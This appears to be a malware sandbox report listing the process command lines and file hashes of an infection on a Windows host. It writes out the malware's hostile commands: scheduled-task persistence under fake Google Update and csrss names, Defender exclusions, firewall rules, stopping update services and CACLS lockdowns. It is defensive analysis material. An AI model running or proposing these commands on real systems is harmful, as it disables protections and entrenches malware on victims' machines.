C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3832 -ip 3832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 396

C:\Users\Admin\AppData\Local\Temp\C0F1.exe

C:\Users\Admin\AppData\Local\Temp\C0F1.exe

C:\Users\Admin\AppData\Local\Temp\C1DD.exe

C:\Users\Admin\AppData\Local\Temp\C1DD.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3940 -ip 3940

C:\Users\Admin\AppData\Local\Temp\C384.exe

C:\Users\Admin\AppData\Local\Temp\C384.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1712 -ip 1712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3940 -s 236

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BF39.tmp\BF3A.tmp\BF4B.bat C:\Users\Admin\AppData\Local\Temp\BE31.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4600 -ip 4600

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4600 -s 412

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yI890Ix.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2yI890Ix.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffab6b746f8,0x7ffab6b74708,0x7ffab6b74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab6b746f8,0x7ffab6b74708,0x7ffab6b74718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3260 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1980,16944698580324844675,444388564524661372,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1980,16944698580324844675,444388564524661372,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,7452106453434838149,4049887481872662037,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\F90C.exe

C:\Users\Admin\AppData\Local\Temp\F90C.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\4180.exe

C:\Users\Admin\AppData\Local\Temp\4180.exe

C:\Users\Admin\AppData\Local\Temp\4430.exe

C:\Users\Admin\AppData\Local\Temp\4430.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5824 -ip 5824

C:\Users\Admin\AppData\Local\Temp\4838.exe

C:\Users\Admin\AppData\Local\Temp\4838.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5824 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1364 -ip 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 772

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

Network


Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe

MD5 c268c396b0a43fb327966b84bb7a85e3
SHA1 88ef7629b07cdb0898d4c527074ac0b2257f7635
SHA256 9d8281522d4b63cffa01f617607c8000c94c4381ab4b1fa9f7f7d386efb32d7d
SHA512 f637c9ac797bbca1bd8684aa17197ed962ad290fe0512f010b257bae332f51b92ebb9a0f6adca3df74ee8cd3338e1a81ec851dd633fd14e7f35910e1d81ee7a1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe

MD5 97e69a6510b539462ea0ae267b0ad4be
SHA1 5ad7587dfd8f5e2ed9820a3143df71c3ab7fa496
SHA256 a3872b2782bc7be1d66230baea590602cf4c8e8c75e695917d50e8dc8c6ed3b8
SHA512 9d38d33267df63078ad1d2435acdca5fb2c27c5aeeafb9916e28c385533d79a125c51e48675658a2babf30936c0a37da65575ad3958d856bb6bdbea2cdca4b3d

memory/3800-14-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3800-15-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

MD5 1d0384fe1c14e55067786e2fc41e74b1
SHA1 f5d5060ed4f0f899d24017a4cc76e06f1d1f2a51
SHA256 7db07f6379b329128cacc0c8bf21ea055a76a8ca3ed4bd299be233f19bbf19e7
SHA512 341b54b88c0d0ebf418b17ffdab811f6c3487b9c25d9639352a5332113961f32f37eba9180527bf43f27af112495327c7b8833f53907e85e2952366cc40dd2fb

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe

MD5 1d0384fe1c14e55067786e2fc41e74b1
SHA1 f5d5060ed4f0f899d24017a4cc76e06f1d1f2a51
SHA256 7db07f6379b329128cacc0c8bf21ea055a76a8ca3ed4bd299be233f19bbf19e7
SHA512 341b54b88c0d0ebf418b17ffdab811f6c3487b9c25d9639352a5332113961f32f37eba9180527bf43f27af112495327c7b8833f53907e85e2952366cc40dd2fb

memory/4708-19-0x0000000000400000-0x0000000000428000-memory.dmp

memory/4708-20-0x0000000000400000-0x0000000000428000-memory.dmp

memory/4708-21-0x0000000000400000-0x0000000000428000-memory.dmp

memory/4708-23-0x0000000000400000-0x0000000000428000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

MD5 2840cb895821b001a690e7586be71a84
SHA1 d67b677fdc85125dc1b57a77cbce68aacdfb25ab
SHA256 7175f3e8968b31e05bed7198ca509d2598025d9ce695bcd5b15643d7cfb4f193
SHA512 1c6ed185521264629d9d0b6db524ad8f63e9f260592372963a8eb0a837336b52578c0e1cf2b3e4b6ef1b8f346050ffa6d5e3e25f6d387d9d7c30fdffa891e575

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4318281.exe

MD5 2840cb895821b001a690e7586be71a84
SHA1 d67b677fdc85125dc1b57a77cbce68aacdfb25ab
SHA256 7175f3e8968b31e05bed7198ca509d2598025d9ce695bcd5b15643d7cfb4f193
SHA512 1c6ed185521264629d9d0b6db524ad8f63e9f260592372963a8eb0a837336b52578c0e1cf2b3e4b6ef1b8f346050ffa6d5e3e25f6d387d9d7c30fdffa891e575

memory/2556-27-0x0000000003070000-0x0000000003086000-memory.dmp

memory/3800-28-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BB41.exe

MD5 18f2df35b217f371367a47b647e3b2de
SHA1 28d3011dc58f3e4435b270fd7b2c1fc2f52c3f9b
SHA256 53c9def020680a7d95ee3cdb6e613e34e8c239428e7470f3e0d60e999375e2ae
SHA512 a4072bfab42502d0297cf78e159bb6dde218a0ab38472aa192d715df2cf4827d33b02aaa53e16251b28cb89144de0698070d443c06a40d4b71e8ee71b3ac6073

C:\Users\Admin\AppData\Local\Temp\BB41.exe

MD5 18f2df35b217f371367a47b647e3b2de
SHA1 28d3011dc58f3e4435b270fd7b2c1fc2f52c3f9b
SHA256 53c9def020680a7d95ee3cdb6e613e34e8c239428e7470f3e0d60e999375e2ae
SHA512 a4072bfab42502d0297cf78e159bb6dde218a0ab38472aa192d715df2cf4827d33b02aaa53e16251b28cb89144de0698070d443c06a40d4b71e8ee71b3ac6073

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

MD5 e9661026ef87fd380b2017538821b60c
SHA1 343e2c16d31cd8f83625cadfc5cee5576a62dcb0
SHA256 b15754e6ab27f97c36e4dbff265064efb909d6aaeb06adafd32a662a33a1690d
SHA512 61e36cbea7d31a6fb6ad9e73db15b29651dc11409d98e9bef36b1c1d501dbf6e58c0f9b0f73e34ac7b63985095d475f435c005b08cd6f4f29b0f354f5e58706f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe

MD5 e9661026ef87fd380b2017538821b60c
SHA1 343e2c16d31cd8f83625cadfc5cee5576a62dcb0
SHA256 b15754e6ab27f97c36e4dbff265064efb909d6aaeb06adafd32a662a33a1690d
SHA512 61e36cbea7d31a6fb6ad9e73db15b29651dc11409d98e9bef36b1c1d501dbf6e58c0f9b0f73e34ac7b63985095d475f435c005b08cd6f4f29b0f354f5e58706f

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

C:\Users\Admin\AppData\Local\Temp\BCF8.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

MD5 f10122bafe5e0425a2a6104303c97919
SHA1 af34653f6babf3b509a24004b9814254d875605a
SHA256 22f28ce83190e803341dc321545935ebda79db561da478fc6144c1b443b9d402
SHA512 6bcffa310cd0e9952336d8e64dce10eef0a40e8b4ee23cff9808f05454578b9ddcadb28956430d31c508058ba5ceb6838b443f899cb3051873d1309dbf154230

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe

MD5 f10122bafe5e0425a2a6104303c97919
SHA1 af34653f6babf3b509a24004b9814254d875605a
SHA256 22f28ce83190e803341dc321545935ebda79db561da478fc6144c1b443b9d402
SHA512 6bcffa310cd0e9952336d8e64dce10eef0a40e8b4ee23cff9808f05454578b9ddcadb28956430d31c508058ba5ceb6838b443f899cb3051873d1309dbf154230

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

MD5 3a274675cd6592f0c6b0c095aedc4e1f
SHA1 a56aa3bad5c46af1f440d57289b469e793f77b30
SHA256 0e10b9dabc6241e5f25067d4953bae55c033ea4ec4ba00b4fa32a07f805dc4ce
SHA512 761be28539cf4075185ee2bc7575aed7a0f6a3c753575aa3a7adb1c29afb099e51aa51828003fbf30bbd9f7bd56c8b130a550fe189b0423c49fd0a99d3829569

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe

MD5 3a274675cd6592f0c6b0c095aedc4e1f
SHA1 a56aa3bad5c46af1f440d57289b469e793f77b30
SHA256 0e10b9dabc6241e5f25067d4953bae55c033ea4ec4ba00b4fa32a07f805dc4ce
SHA512 761be28539cf4075185ee2bc7575aed7a0f6a3c753575aa3a7adb1c29afb099e51aa51828003fbf30bbd9f7bd56c8b130a550fe189b0423c49fd0a99d3829569

C:\Users\Admin\AppData\Local\Temp\BE31.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe

MD5 b82208f2999127e3e97a0bd0e5b0160a
SHA1 ad0c851f144bc055853556b2b9c62d7d36e8c156
SHA256 d40be1fbeb784205f89f504297f0a4c277b17a0c63aa43f8cfb80839ad7a808e
SHA512 6d5a1de85d1d6e6a1f8fea1c9ca32e483d162f3b02f7964676862c026c0f29691f45d38eac5fe728a2fccd1e830e0e8d6835c7393edac1065734cc566f4a609a

C:\Users\Admin\AppData\Local\Temp\BE31.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
SHA256 a621ce64756eef9f31443f5549efd1a488e0a219a517df2c8e21fad3d79b10ba
SHA512 5a271f5b8e94b0afde555b7fe4727a846ab2eb3692bcdc3ff01d4c377f283e2f410c5dcdab129e5f111528220c9335d4f5145ca351f105fe4f0168a95ccabaea

C:\Users\Admin\AppData\Local\Temp\BE31.bat

MD5 9db53ae9e8af72f18e08c8b8955f8035
SHA1 50ae5f80c1246733d54db98fac07380b1b2ff90d
SHA256 d1d32c30e132d6348bd8e8baff51d1b706e78204b7f5775874946a7019a92b89
SHA512 3cfb3104befbb5d60b5844e3841bf7c61baed8671191cfc42e0666c6ce92412ab235c70be718f52cfbd0e338c9f6f04508e0fd07b30f9bbda389e2e649c199d1

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1oS28ea9.exe

MD5 799d6ef3a71bc01c534a01ef153c4036
SHA1 2d187184c1902eb82125d1c37dcf095b72232ec3
